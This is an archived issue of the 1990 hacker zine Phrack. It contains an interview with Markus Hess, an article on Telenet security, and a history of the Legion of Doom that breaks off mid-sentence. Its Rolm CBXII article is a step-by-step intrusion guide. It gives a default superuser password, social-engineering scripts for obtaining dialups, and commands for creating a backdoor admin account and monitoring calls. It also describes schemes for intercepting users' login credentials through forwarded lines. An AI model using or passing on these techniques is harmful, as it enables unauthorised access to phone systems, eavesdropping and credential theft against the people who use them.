home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 31.sit / Phrack Issue 31
Text File  |  1997-02-22  |  166KB  |  3,649 lines

  1. <head>
  2. <title>Phrack Magazine Issue 31, File 1 of 1 </title>
  3. <head>
  4. <body>
  5. <pre>
  6.  
  7.  
  8.  
  9.                                ==Phrack Inc.==
  10.                  Volume Three, Issue Thirty-one, Phile #1 of 9
  11.                               Issue XXXI Index
  12.                               ________________
  13.                               P H R A C K   3 1
  14.                                   05/28\90
  15.                               ________________
  16.  
  17.        Welcome to a new begining of Phrack Inc.  Yes, Phrack is not dead.
  18.      On the contrary, Phrack will and can't ever die.  Phrack is more than just
  19. a technical newsletter  that comes out every now and then, it's a symbol of our
  20. hacking history.   Whether,  it's  called Phrack  or some  other  name, it will
  21. always be published for the same reasons:
  22.    1. Inform it's readers of current events and other related items
  23.              of hacker interest.
  24.    2. Educate it's readers on all topics of shared common interests
  25.              that may benefit the hacker at his hobby.
  26.    3. Remain an authority in the hacking world and an observer in the
  27.              ever growing technical community.
  28.    4. Be open to anyone who wishes to submit an article for publication
  29.              that will further the hacker's education.
  30.     Many things have happened since the last publication of Phrack.  We at
  31. Phrack inc. will try to "shed some light" on the matters that have occured. And
  32. as for all these ridiculous rumors that have been spreading, let us speak the
  33. truth and be heard.
  34.     Hah.  No my friends, Phrack is not dead..
  35.     --DH (Editor)
  36.      Note:  If you wish to contact Phrack inc. to submit a file, ask around for
  37. a Phrack inc.  distribution site  --  Then Email "Phrack inc." and be very very
  38. patient.
  39.      Note:  Special thanks to T C, Phz, and others for wide
  40. area distribution.
  41. _______________________________________________________________________________
  42.  
  43. Phrack XXXI Table of Contents
  44. =============================
  45. 31-1. Introduction to Phrack 31 by DH          (2K)
  46. 31-2. Phrack Pro-Phile of Markus Hess by PHz            (6K)
  47. 31-3. Hacking Rolm's CBXII by DH               (15K)
  48. 31-4. TAMS & Telenet Security by Phreak_Accident        (7K)
  49. 31-5. The history of The Legion Of Doom                 (10K)
  50. 31-6. Cosmos Overview by EBA                  (52k)
  51. 31-7. Tymnet Security Memo by Anonymous                 (9K)
  52. 31-8. PWN/Part01 by Phreak_Accident                     (13K)
  53. 31-9. PWN/Part02 by Phreak_Accident                     (17K)
  54. 31-10. PWN/Part03 by Phreak_Accident                    (40K)
  55. _______________________________________________________________________________
  56.  
  57.                                 ==Phrack Inc.==
  58.                 Volume Three, Issue Thirty-one, Phile #2 of 10
  59.                 -*[  P H R A C K  # 3 1   P R O P H I L E  ]*-
  60.                             -*[  June 1, 1990  ]*-
  61.                                -*[Phz]*-
  62. ---[ Markus Hess ]---
  63.    Recently the Phrack editors had the opportunity to talk to Markus Hess in
  64. his tiny Hannover flat.  This special edition of the Phrack Prophile details
  65. our conversation, as well as general background information about the German
  66. Hacker.
  67.    This Phrack Prophile is not in the same format as previous ones because of
  68. the nature of the profile. In the next issue, we will reform back to the
  69. orginal creator's format.
  70.             AGE: 26
  71.          HEIGHT: 5' 10"
  72.      HAIR COLOR: BROWN
  73.            EYES: BROWN
  74.            FROM: Hannover, West Germany
  75. PAST EMPLOYMENT: Software developer in Hannover.
  76.          PEOPLE: Stephen Winero, Walu Holland (Other CCC members)
  77.       STRENGTHS: AT&T Unix, VAX, SunOs and BSD os's
  78.  
  79.    Hess, most well known as the hacker who's exploits are detailed in
  80. Clifford Stoll's _The_Cuckoo's_Egg_, "is as paranoid on the telephone as he
  81. is on the computer."  Although he was very reluctant to talk to us, we did
  82. manage to talk to him about hacking and _The_Cuckoo's_Egg_.
  83. Ringing Hanover..
  84. RING
  85. RING
  86. RING
  87. ANSWERED
  88. HESS: Hallo?
  89. PHRACK: Is this Markus Hess?
  90. HESS: Yes.
  91. PHRACK: Do you smoke Benson & Hedges?
  92.          (At this point we weren't sure it was actually him)
  93. HESS: Yes, who is this?
  94. PHRACK: We are calling from the USA, we want to ask you some questions.
  95.         We talk to hackers in the USA.
  96. HESS: I won't have anything to do with hackers anymore.  I have talked in
  97.       court earlier this year.
  98. PHRACK: Did you know you were in a novel about a hacker in the US?
  99. HESS: Novel? Yes, I know of a novel.
  100. PHRACK: Have you read the book?
  101. HESS: Yes I have read the book.
  102. PHRACK: Is it all true?  Is it all true?  Do you think Cliff lied or tried
  103.         to exaggerate in the book?
  104. HESS: Yes, I think so.
  105. HESS: Yes, He lied.
  106. PHRACK: Have you ever talked to Stoll?
  107. HESS: I have talked to him, but not privately.  I don't want to talk about
  108.       this.
  109. PHRACK: Have you ever seen Cliff Stoll?
  110. HESS: Yes I have seen him.
  111.       (We might think this from the back of the book)
  112. PHRACK: He's goofy looking isn't he?
  113. HESS: goofy? I don't understand.
  114. PHRACK: Anyway, so you think he lied in the book?
  115. HESS: Yes, he lied.
  116. PHRACK: What did he lie about?
  117. HESS: I don't want to talk about this.
  118. PHRACK: Okay, are you in the Chaos Computer Club?
  119. HESS: No, I won't have anything to do with hackers any more.
  120. PHRACK: Were you ever involved with them?
  121. HESS: No.  I was not in it.
  122. PHRACK: Do you know anyone in it [the CCC]?
  123. HESS: Yes.  I really must go now.
  124. PHRACK: Who do you know in it [the CCC]?
  125. HESS: Stephen Winero.
  126. PHRACK: Is that it?
  127. HESS: I know Walu.
  128. PHRACK: Hmm.  Are you being watched?
  129. HESS: I think so.  I can not talk about this.
  130. PHRACK: Were you scared of going to jail?
  131. HESS: jail?
  132. PHRACK: Prison, were you scared of going to prison?
  133. HESS: I don't know.
  134. PHRACK: What happened in your words at court?
  135. HESS: In your words? I don't understand.
  136. PHRACK: What happened in court?
  137. HESS: I don't understand.
  138. PHRACK: Forget it.
  139. PHRACK: Do you still have your computer?
  140. HESS: No. I don't have any computer here.
  141. PHRACK: Did you think they were going to catch you?
  142. HESS: No.  I knew nothing of it.
  143. PHRACK: Has any other hackers tried to contact you in the U.S.?
  144. HESS: No. You are the first to call.
  145. PHRACK: So is it my understanding that Stoll lied in parts of the book?
  146. HESS: Lied?  Yes he lied.
  147. PHRACK: Why do you think he would lie?
  148. HESS: I don't know.
  149. PHRACK: Do you think he made you look destructive?
  150. HESS: Yes.  He made me look mean.
  151. PHRACK: Are you? Mean that is?
  152.         (Chuckle)
  153. HESS: No.  He made me look like I was a criminal.
  154. PHRACK: Why did you do it Markus?
  155. HESS: Do what?
  156. PHRACK: Hack all over the network like that?
  157. HESS: I cannot answer.
  158. PHRACK: Do they call you a liar in court?
  159. HESS: Yes.  They call me a liar.
  160. PHRACK: What are you going to do now?
  161. HESS: I don't understand.
  162. PHRACK: Are you finished with hacking?
  163. HESS: Yes, I have nothing to do with hackers.
  164. PHRACK: Was someone helping you hack?
  165. HESS: I cannot answer.
  166. PHRACK: How come you cannot answer that question?
  167. HESS: I cannot.
  168. PHRACK: Yes, well, Many in the U.S. [hackers] don't like the Novel.
  169. PHRACK: What do you think of it?
  170. HESS: It is not true.
  171. HESS: I don't know.
  172. PHRACK: Who taught you the EMACS hole?
  173. HESS: I cannot say.
  174. PHRACK: Then you must have been working with someone, correct?
  175. HESS: No, I cannot answer.
  176. PHRACK: Is the police comming down on you hard?
  177. HESS: police? I don't und...
  178. PHRACK: Yeah, yeah.  The law? Are they being hard on you.
  179. HESS: Yes.
  180. <SILENCE>
  181. HESS: I must go now.
  182. PHRACK: Can we call you later?
  183. HESS: Umm, I don't know. No.
  184. PHRACK: Why not?
  185. HESS: I cannot answer.
  186. PHRACK: What about in a couple of months?
  187. HESS: Yes, in a couple of months you can call.
  188. PHRACK: Your not moving are you?
  189.         (Knowing that Germans rarely ever move and their phone
  190.          numbers never change this was a silly Q.)
  191. HESS: No. I no move.
  192. PHRACK: Okay, then we'll call you in a couple of months.
  193. HESS: Okay. I must go.
  194. PHRACK: Wait a second.
  195. HESS: Yes?
  196. PHRACK: Do you have anything to say to American Hackers?
  197. HESS: No.
  198. HESS: I have nothing to do with hackers.
  199. PHRACK: Well, good luck.
  200. HESS: Yes, you too.
  201. <CLICK>
  202.  
  203.    Unfortunately, our lack of German and Hess' weak English made
  204. communication difficult.  He is a very paranoid person who was obviously
  205. uncomfortable talking to us.
  206.    Those of you that have read Stoll's book know that Hess was involved
  207. with hacks on American Military Computers, and indirectly involved with
  208. Computer Espionage and the KGB.  Phrack strongly discourages trying to
  209. hack Military computers and particularly takes offense to computer
  210. espionage.
  211.    From the information we have gathered from him and by talking to him,
  212. we feel that Markus Hess wasn't as smart as Clifford Stoll portrayed him to be.
  213. We also feel that Markus was not working alone and that others were involved.
  214. This however we cannot be 100% sure because of our communication faults.
  215.  
  216. _______________________________________________________________________________
  217.  
  218.                              ===Phrack Inc.===
  219.                Volume Three, Issue Thirty-one, Phile #3 of 10
  220.               /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
  221.              / *                                            * \
  222.              \                                                /
  223.              /           Hacking Rolm's CBXII/9000            \
  224.              \                by DH                  /
  225.              /                   05/24/90                     \
  226.              \ *                                            * /
  227.               \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
  228.  
  229. Introduction
  230. ------------
  231.      IBM Rolm's CBXII/9000 is a very powerful machine.  Powerful in the aspect
  232. that one has the switch(s) at his control.  Controling switches means you can
  233. control the entire PBX environment (And it's users).
  234.      This file will not get technical.  Basically, I'm writing this file on
  235. the HOW-TO's of the internal works of CBXII and the basics of obtaining the
  236. dialups and account information need to access the machines.  For further
  237. information on CBX's in general, read Epsilon's Phrack Phile on them, or
  238. consult Evil Jay's phile on OSL's.
  239.  
  240. Obtaining Dialups
  241. --------- -------
  242.       Obtaining dialups unfortunately is the hardest part of hacking CBXII's.
  243. (Yes, even harder than hacking them).  There are several ways to obtain the
  244. dialups.  I would say a good bit of CBX's are at universities and hospitals
  245. where they own their own switches.  Most of the time you can determine if they
  246. have one by calling the Telecommunications Department of the target location.
  247. Or, another way is to check with ROLM.  If you *KNOW* that a target location
  248. has a CBXxx machine, you can call ROLM's 800 wats line and say your with the
  249. Telecommunications Department and your looking for the DIALUP.  Rolm has files
  250. on all their CBXxx's and the Dialups also.  They might ask you for a NODE #
  251. for the dialup, and you should usually respond with what node you want (Since
  252. different nodes handle different areas of the PBX).  Basically, nodes start at
  253. ONE and usually goto THREE or FOUR, depending on the size of the PBX.
  254.        CBXxx's are greatly compatible of IBM Rolm's Phone-Mail system (Which
  255. is a highly used and common voice mail system).  This of course doesn't mean
  256. that every PHM (Phone-Mail) system has a CBXxx attached.  But it is generally
  257. a good start.
  258.        The following is a checklist to determine if the target location could
  259. have a CBXxx for controlling their switch.  By no means however, if your target
  260. location has all of the following it could have a CBXxx.
  261.         1) Does the location handle it's own switch?
  262.             If so, what kind, and who services it.
  263.         2) Does IBM Rolm handle any aspect of their telecommunications
  264.            department?
  265.             If so, this is a possible CBXxx location.
  266.         3) Does the location have Rolm Phone-Mail?
  267.         These three guidelines are not requirements.  I.E. -- The location
  268. could have a non-IBM PBX but still have a CBXxx for handling the switch.
  269. So who knows.. It's up to you and your bullshitting and scans.
  270. Hacking the CBXxx's
  271. ------- --- -------
  272.         Well, once you have obtained the dial-ups, you are almost halfway
  273. there.  Hacking the CBX is the easy part.  1st off, IBM Rolm ships *ALL*
  274. of their machines with a default account (Yes, and they never change it).
  275. When the destination of the CBX recieves the machine, they use the default
  276. to create other accounts for employees, PBX operators, and administration.
  277. Rolm IBM also has a field support account embedded in the machine.  These
  278. are different to each location and correspond to the serial number of the
  279. machine (Rolm's accounts can be obtained from Rolm's 800 technical support
  280. line).  So, now that we know that there is a default account that telecom
  281. department uses to setup the other accounts after they recieve the machine,
  282. tells us that this is a priviledge account.  And it is.
  283.          USERNAME: SU
  284.          PASSWORD: SUPER
  285.         How nice for them to give us such power.  Yes, it's a basic default
  286. with SuperUser priviledge.  If for some reason the account default has been
  287. changed, their are other ways of getting in:
  288.          1) Call Rolm and get the Field account information.
  289.          2) Try first names of Telecom Dept. employees, and PBX Operators.
  290.          3) Use every Hacking skills you have (If any).
  291.         Some older versions of CBX don't even require logging in with an
  292. account.  Those versions are less responsive to the administrators needs,
  293. but can be useful to one also.  Don't be discouraged if the SU password is
  294. changed, just call Rolm and get the field account.
  295.         The following is the matrix before one access the machine. *Note that
  296. it clearly identifies* *Also: Accessible at 300 baud and e,7,1*
  297. CONNECT                                ID banner
  298.                  _Release version #  /
  299.                 /                   /\
  300. Rolm CBXII  RELEASE 9004.0.65 RB74UCLA11956
  301. BIND DATE: 8/SEP/88                 \
  302. YOU HAVE ENTERED NODE 1, CPU 2       \_Name of owner, IE: UCLA
  303. 11:14:30 ON FRIDAY 2/11/1990             (System ID)
  304. USERNAME: xxx
  305. PASSWORD: xxx
  306. INVALID USERNAME-PASSWORD PAIR.
  307.  
  308. Once your in
  309. ---- ---- --
  310.          Once your in, you should have no problems wondering around the
  311. machine and using the utilities in the machine's operating system.  There is
  312. very specific help functions inside the machine that will guide you through
  313. with no problems.  At the CBX prompt:
  314. %. HELP ?
  315. or
  316. %. ?
  317.           Should produce a valid listing of options and sub-functions.  Every
  318. function can be followed with a '?' to give lists of valid sub-functions under
  319. that function or how the syntax of that function should be used.
  320.           The following is a listing of commands for CBXII/9000:
  321. ABORT              ACTIVATE            ATTR                BYE
  322. CANCEL             CARD                CDRSM               CDT
  323. CHANGE             CHG                 CLEAR               CLR
  324. CMPCT              CMSTS               CNCL                CNFG
  325. CONVERT            COPY                CPEG                CTMON
  326. CTRA               CTRTL               CXCLR               COPY
  327. CXCLR              CXCON               CXNET               DACK
  328. DADD               DAEVT               DANS                DBDMP
  329. DCAT               DCF                 DCOM                DDMA
  330. DDQ                DDT                 DE                  DEACTIVATE
  331. DEFINE             DELETE              DEMOUNT             DESUM
  332. DEX                DFACK               DFCOM               DFEAT
  333. DFEVT              DHTQ                DHWS                DIAG
  334. DIQ                DISABLE             DIWQ                DKQ
  335. DML                DMNT                DMS                 DMTST
  336. DOWN               DPATR               DPMR                DPMS
  337. DPPRI              DPTR                DQQ                 DRCT
  338. DREGS              DSBLE               DSQ                 DSST
  339. DSTAK              DTCB                DTDQ                DWQ
  340. DX_TR              ENABLE              ENB                 ENBLE
  341. ETIO               EX                  EXM                 EXN
  342. EXP                EXPAND              FINIT               FORMAT
  343. FREER              FSD                 GTOD                HDBST
  344. HELP               INSTALL             KPFA                LCT
  345. LIST               LOAD                LOGOFF              LOGON
  346. LPEG               LPKT                LSCT                LSL
  347. LST                LTCB                MNT                 MONITOR
  348. MOUNT              MTRACE              NEXT                NSTAT
  349. PAGE               PCNFG               PDIO                PFA
  350. PKTS               PLIST               PLTT                PPFA
  351. PS                 PSH                 QAT                 QITM
  352. QTEST              RCT                 RECEIVE             RENAME
  353. REPLY              RESTART             RESTORE             REVERSE
  354. RM                 RMOFF               RPFA                RSC
  355. RSCLK              RSTOR               RSTRT               SAT
  356. SCAN               SEND                SET                 SHOW
  357. SITM               SOCON               SOUNC               SSAT
  358. START              STATE               STATUS              STEST
  359. STOD               STOP                STRT                STS
  360. TDCD               TEST                TKSTS               TRTL
  361. TST                TX                  UNLK                UNLOCK
  362. UP                 VERIFY              XDEF                XMIT
  363. XPND
  364.      These commands can be executed from and '% ' prompt.  If the command is
  365. followed by a '?', more information will be supplied about the command.
  366. Using the ICI
  367. ----- --- ---
  368.      The Interactive Configuration Interface controls immediate changes in
  369. the switch and PBX environment.  The Utility is explained in great detail
  370. through the actual running of it.  You can access the ICI by typing:
  371. % CNFG
  372.                        CBXII/9000
  373.         INTERACTIVE  CONFIGURATION INTERFACE
  374.                          CPU 2
  375. 15:14:32 ON FRIDAY 5/02/1990
  376. COMMAND:
  377.       This is the main command prompt.  From here you can exercise the '?'
  378. help list to get valid commands.  There are four phases of the ICI utility:
  379. Modify, Create, List, and Delete.  These can be used on Extentions, Trunks,
  380. Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect.
  381. The following is a sample of using 'list' to list a current extention in the
  382. PBX:
  383.                                _Forward to EXTN 2000
  384. COMMAND: LIST EXT 4038        /                            _Outside number
  385.                              /             FORWARD ON     /  to forward to
  386.                            FORWARDING     BSY RNA DND    /
  387.    EXTN     TYPE   COS   TARGET1 TARGET2  I E I E I E RINGDOWN  NAME
  388.    ----     ----   ---   ------- -------  - - - - - - --------  ----------
  389. DS 4038     EXTN   56    2000             1 1 1 1 1 1 95551212  R.STABELL
  390.     \          \    \                     /   /    \               \
  391.     Extention  /     -Class of service   if  R    Auto. Forward   Owner of
  392.               --Type of line            BUSY  I   No Matter What   EXTN.
  393.                 (Reg. Extention)               N
  394.                                                 G
  395. Note: The 1's specifies to forward to target#1    & NO ANSWER
  396.       (As 2's would mean forward to #2 target)
  397.      This should detail how to modify a listing like above using the 'MODIFY'
  398. command in the ICI.  Once modified, all transactions are processed immediately.
  399. Using the 'Delete' command one can delete extentions, trunks, ect.
  400.      So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE.
  401. Each can be used with the following "Nouns" to modify that "Noun":
  402. BUTTON_120         BUTTON_240          CDR_EXCLUDE         CNFG_ERRORS
  403. CNFG_QUEUE         CNFG_STATUS         CNFG_USERS          COM_GROUP
  404. COS_FEAT           DATA_ACCESS         DATA_DEVICE         DATA_GROUP
  405. DATA_LINE          DATA_SUBMUX         DLI                 ETS
  406. EXTEN              FAC                 FAC_TYPE            FAMILY
  407. FEAT_CODE          FIRST_DIGIT         HD_GROUP            LEX
  408. LOGON_PROFILE      MAP                 MEM_PARTS           PARAM
  409. PICK               POWER               Q_TYPE              ROUTE_LIST
  410. RP                 RPD                 RPI                 RPS_120S_ON
  411. RPS_240S_ON        SAT_NAME            SEARCH_SEQ          SECTION
  412. SECURITY_GROUP     SERVICE_LIST        SIO_PARTS           SLI
  413. SPEED              T1D3                T1D3_GRP            TRUNK
  414. TRUNK_GROUP        VPC
  415.       The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on
  416. the system.  One can use MODFIY or CREATE to set them up an account with SU
  417. access.  The FAMILY noun is the listing of the groups with different access,
  418. to different "nouns" available. I.E.: Not everyone can access the CHANGE
  419. LOGON_PROFILE to create an account.
  420.       To create an account with SU access, type (while in ICI):
  421. % CREATE LOGON_PROFILE
  422. ENTER NAME (1-12 CHAR): TEST
  423. ENTER PASSWORD: TEST
  424. RETYPE: TEST
  425.       Next it will ask you for a family.  For SU access, type "SYSTEM_ADMIN".
  426. After family, the machine should prompt you for a "verb". Verbs are the actual
  427. functions or commands, so in this environment you can set the commands a user
  428. can access.  So, for SU, enter "ALL" for every command access.
  429.       To get a valid listing of users online, try this:
  430. % LIST CNFG_USERS
  431. NUMBER OF USERS    MAX NUMBER OF USERS
  432.      3                  5
  433. PORT    USER_NAME    START_TIME  HOW_LONG
  434. 17      SU           17:47:57    0:28:34
  435. 2       FIELD        18:16:03    0:0:28
  436. 3       MARYB        18:16:03    0:10:03
  437.  
  438. Using the Monitoring Utility
  439. ----- --- ---------- -------
  440.       This command is one of the more powerful commands in the CBXxx system.
  441. The monitor command should be invoked from within the main function command
  442. level and not in the ICI level.  The monitoring command allows you to actually
  443. watch or monitor TRUNKS and EXTENTIONS.  So, if I were to type:
  444. % MONITOR EXT 4038
  445. 10:02:43 ON FRIDAY MAY/02/1990
  446. EXT#   STATE            DI  CODE  DIGITS         PROCESS      STATUS
  447. ----   ---------------  --  ----  -------------  ------------ ------
  448. 4038   IDLE                                      STN FWD NUM   FWD
  449.  \         \                                     /    /    /    \
  450. Extention   Not in use                   Standard     \   /        Forwarded
  451.                                          Extention     \ /
  452.                                                     Forwarded to
  453.                                                      a number
  454.       This shows the extention to be IDLE and not in use.  But, with forwarded
  455. call processes to a standard number.  You would have to use ICI to look up the
  456. number it's forwarded to if you wanted.
  457. % MONITOR EXT 4038
  458. 10:03:44 ON FRIDAY MAY/11/1990
  459. EXT#    STATE           DI  CODE  DIGITS         PROCESS     STATUS
  460. ----    --------------  --  ----  -------------  ----------- ------
  461. 4038    DIAL TONE                                STN FWD NUM  FWD
  462. 4038    DIALING         Y         9             /    \   \     \
  463. 4038    DIALING         Y         92           S     F    N     \Extention
  464. 4038    DIALING         Y         923           t     o    u       Forwarded
  465. 4038    DIALING         Y         9233           a N   r    m
  466. 4038    DIALING         Y         92334           n u   w    b
  467. 4038    DIALING         Y         923345           d m   a    e
  468. 4038    DIALING         Y         9233456           a b   r    r
  469. 4038    DIALING         Y         92334564           r e   d
  470. 4038    CONN T025N      N              \              d r   e
  471.  /             \        /               \                    d
  472.  \              \       \_Dialing NO     \_Number dialed
  473.   \_Extention    \
  474.                Connected to
  475.               Outside trunk T025N
  476.      This monitoring shows the extention actually dialing the number, and then
  477. connecting to an outside truck.  Unfortunatley, one we cannot monitor without
  478. access to a bell switch.
  479.      Monitoring can also be done with trunks.  I will not display any trunk
  480. monitoring since it is quite simple to decypher.
  481. Manipulating the switch
  482. ------------ --- ------
  483.      There are many ways you can manipulate the CBX's to gain accounting
  484. information on data lines within the PBX environment.  One sure-fire method
  485. would be to forward an actual data dial-up extention to a bridge or loop and
  486. then write an emulation to intercept the user's account information real-time
  487. as they connect to your fake dial-up.
  488.      Or perhaps if an university uses the CBX, one could maybe forward the
  489. computer help desk extention to a bridge or loop and as an unsuspecting user
  490. calls up, ask him what machine and account info he has access to for a help
  491. log sheet you are taking.
  492.     Who cares. Who knows.  There are thousands of things you can do to use
  493. the CBX to your advantage.  Hell, you have the whole switch at your command.
  494. DH -  05/11/90
  495.  
  496. _______________________________________________________________________________
  497.  
  498.                              ==Phrack Inc.==
  499.              Volume Three, Issue Thirty-one, Phile #4 of 10
  500.               /  Everything you always wanted to know..  \
  501.       /  about Telenet Security, But were to stupid to find out. \
  502.                             By Phreak_Accident
  503.      Ever since the early 80's GTE Telenet has been expanding their public
  504. packet switching system to hold enormous amounts of users.  Currently GTE
  505. SprintNet (Yes, Telenet is out, SprintNet is in.) has over 300 nodes in the
  506. United States and over 70 other nodes abroad.  SprintNet provides private
  507. X.25 networks for larger companies that may have the need.  These private
  508. networks are all based on SprintNet's 3270 Dedicated Access Facility which
  509. is currently operating for public use, Hence for the major security Sprint-
  510. Net has aquired.
  511.       SprintNet's security department is a common idea of what any large
  512. public packet network should be.  With their home office located in Virgina
  513. (703), most Hacker's who run into trouble with them would wind up talking
  514. to Steve Mathews (Not the head of security but a prime force against the
  515. major attacks Sprintnet recieves from Hackers anually.), who is a very
  516. intelligable security analysist that deals with this type of problem daily.
  517.       Because of Steve's awarness on Hackers invading "His" system (As most
  518. security personnel refer to the system's they work for as their own.), He
  519. often does log into Bulletin Boards accross the country looking for Sprint-
  520. Net related contraband.  At the time of this article, Steve is running an
  521. investigation on "Dr. Dissector's" NUAA program. (NUA attacker is a Sprint-
  522. Net NUA scanner.)  Besides this investigation, he currently stays in contact
  523. with many Hackers in the United States and Abroad.  It seems Steve recieves
  524. many calls a month from selected Hackers that have interests in the Security
  525. of SprintNet.  Wow.  Who the Hell would want to call this guy.  From many
  526. observations of Steve Mathews, I find him to in deed be the type to feel a
  527. bit scared of Hackers.  Of course, his fright is really quite common amoung
  528. security personnel since most fear for their systems as well as themselves.
  529. (Past experiences have showed them not to take Hackers lightly, Hence they
  530. have more contacts then 60 rolodex's put together.)
  531.        For now, let's forget Steve Mathews.  He's not important an important
  532. influence in this article.  Trying to pin a one-person in a security depart-
  533. ment that handles security is like finding a someone on a pirate board that
  534. doesn't use the word "C0DE" in their daily vocabulary.
  535.        Telenet's main form of security lies in their security software called
  536. TAMS (Telenet Access Manager System).  The TAMS computers are located in Res-
  537. tin, Virginia but are accessable throughout the network.  Mostly, the main
  538. functions of TAMS are to:
  539.        * Check to see if the NUI/Password entered is a valid one.
  540.        * Check to see if the Host has list of NUI's that can access
  541.             that host.  If another NUI is used, a Rejection occurs.
  542.        * Processes SprintNet's CDR (Call Detail Recording), which
  543.             includes Source and Destination, Time of call, Volumes
  544.             of data recieved, and the Total time of the call.
  545.        * Can be used by host to add an optional "ALPHA" NUA for "easy"
  546.             access.
  547.        * Can secure Hosts further by adding an NUA security password.
  548.        * Restricts calls without an NUI for billing (I.E. No collect
  549.          calls to be processed).
  550.        * Accepts all calls to host as a prepaid call (I.E. Accepts all
  551.          calls).
  552.      TAMS is really for the handling of NUI and corresponding NUA's, therefore
  553. being a security concept.  TAMS holds all the data of NUI's and restricting NUAS
  554. for the ENTIRE network.  If one could gain the access to TAMS, one could have
  555. the entire network at his/her disposal.  This of course if highly impossible
  556. to SprintNet's security department, but not for a couple of hackers I have ran
  557. into.  Yes, TAMS is quite interesting.
  558.       In other aspects of SprintNet security, lets focus on the actual X.25
  559. software that they use.  Anybody who tells you that Telenet can monitor the
  560. sessions currently taking place on THEIR network is WRONG (And probably very
  561. stupid as well).  Monitoring is a basic feature of all X.25 networks, whether
  562. it's a little PeeShooter network or not, they can and do monitor sessions.
  563.        Of course their are far to many calls being placed on SprintNet to be
  564. monitored, but a scared host can always request a full CDR to be put on their
  565. address to record all sessions comming in on that NUA.  Such as the many re-
  566. corded sessions of the ALTOS chat(s) in Germany that was a hot-spot for many
  567. Hackers across the United States and Abroad.  After the detection of ALTOS,
  568. through the hundereds of illegally used NUIs, CDR's and direct host monitoring
  569. were used on the ALTOS hosts.  As far as prosecutions concern, I doubt their
  570. were any.
  571.         Now, as far as other security software on SprintNet, they have a call
  572. tracking service that is called AUTOTRAIL.  Basically, AUTOTRAIL traces the
  573. connections through the DNIC's and back to the orginating NUI and/or NODE loca-
  574. tion that placed the call.
  575.         AUTOTRAIL has nothing to do with ANI.  Not at all.  In fact, the many
  576. dialups that lead into SprintNet's PDM gateway do NOT have any type of ANI.
  577. That is basically a telephony problem.  ALthough I would think twice about
  578. messing with a dialup that is run on a GTE carrier.  That's up to you though.
  579.         Another aspect of security in which Telenet offers is an ASCII tape
  580. that can be obtained by a host customer, which contains all CDR information of
  581. any connection to that host for the last week/month/year.  So, it is obvious
  582. to say that SprintNet does have a hudge database of all CDRs.  Yes, another
  583. point:  This database is located in the TAMS computer.  Hmm, ahh.. Wouldn't
  584. that be neat.
  585. :PA
  586.  
  587. _______________________________________________________________________________
  588.                                ==Phrack Inc.==
  589.                 Volume Three, Issue Thirty-one, Phile #5 of 10
  590.  
  591. The History of The Legion Of Doom
  592. --- ------- -- --- ------ -- ----
  593. During the summer of 1984 an idea was formulated that would ultimately
  594. change the face of the computer underground forever.  This particular
  595. summer, a huge surge of interest in computer telecommunications placed
  596. an incredibly large number of new enthusiasts on the national computer scene.
  597. This crowd of people all seeking to learn as much as possible
  598. began to put a strain on the nation's bulletin board scene, as the novices
  599. stormed the phonelines in search of knowledge.  From out of this chaos
  600. came a need for learned instructors to help pass on their store of
  601. information to the new throngs.
  602. One of the most popular bulletin boards of the day was a system in New York
  603. state called Plovernet, which was run by a person who called himself
  604. Quasi-Moto.  This BBS was so heavily trafficked, that a major long
  605. distance company began blocking all calls to its number (516-935-2481).
  606. The co-sysop of Plovernet was a person known as Lex Luthor.  At the time
  607. there were a few hacking groups in existence, such as Fargo-4A and Knights of
  608. Shadow.  Lex was admitted into KOS in early 1984, but after making a few
  609. suggestions about new members, and having them rejected, Lex decided to
  610. put up an invitation only BBS and to start forming a new group.
  611. Starting around May of 1984, Lex began to contact those people who he had
  612. seen on BBSes such as Plovernet and the people that he knew personally
  613. who possessed the kind of superior knowledge that the group he envisioned
  614. should have.  Many phone calls and Alliance Teleconferences later, the
  615. group of individuals who made up the original Legion of Doom were compiled.
  616. They were:
  617.                Lex Luthor
  618.                Karl Marx
  619.                Mark Tabas
  620.                Agrajag the Prolonged
  621.                King Blotto
  622.                Blue Archer
  623.                EBA
  624.                The Dragyn
  625.                Unknown Soldier
  626. The group originally consisted of two parts:  Legion of Doom, and Legion
  627. of Hackers.  The latter was a sub-group of the first, comprised
  628. of people who were more advanced in computer related subjects.  Later on,
  629. as members began to all become more computer-based, the Legion of Hackers
  630. was absolved.  (The name "Legion of Doom" came from the cartoon series
  631. "Superfriends," in which Lex Luthor, Superman's arch rival, led a group
  632. by the same name)
  633. The actual Legion of Doom bulletin board was quite ahead of its time.
  634. It was one of the first "Invitation-only" hacking based BBSes; it was the
  635. first BBS with security that caused the system to remain idle until
  636. a primary password was entered; and it was the first hacking BBS to deal
  637. with many subjects in close detail, such as trashing and social
  638. engineering.  The BBS underwent three number changes and three different
  639. login procedures during its life.  At its height, the BBS had over
  640. 150 users and averaged about 15 posts per day.  This may seem
  641. high when compared to contemporary BBSes, but this was a private system,
  642. with only very-competent users, so the quality of messages content was always
  643. high.
  644. There was always some confusion that falsely assumed since someone
  645. was on the LOD BBS, that they were a member of the group.  In fact,
  646. only a handful of the total LOD membership were ever on the actual
  647. LOD BBS.
  648. The Legion of Doom also had special subboards created for its members on
  649. other BBSes after the home base BBS went offline.  The first was on
  650. Blottoland, the next on Catch-22, followed by one on the Phoenix Project,
  651. and the last on Black Ice Private.  The group's members have usually tried to
  652. keep a low profile publicly, and usually limited their trade of information
  653. to select private BBSes and personal telephone conversations.  This adherence
  654. to privacy has always added to the LOD mistique.  Since most people didn't
  655. know exactly what the group was involved in, or experimenting with, people
  656. always assumed that it was something far too detailed or sensitive to be
  657. discussed.  For the most part, this was not true, but it did not help to
  658. diminish the paranoia of security personnel that LOD was after their
  659. company's systems.
  660. The group has undergone three distinct phases, each a result of membership
  661. changes.  The first phase ended with the busts of Marx, Tabas, Steve Dahl,
  662. Randy Smith, X-man, and the abandonment by Agrajag and King Blotto.
  663. The group lay semi-dormant for several months, until a resurgence
  664. in the summer of 1986, in which several new members were admitted, and a new
  665. surge of would-be hackers appeared, ready to be tutored.  This phase again
  666. ended in a series of busts and paranoia.  The third phase basically revolved
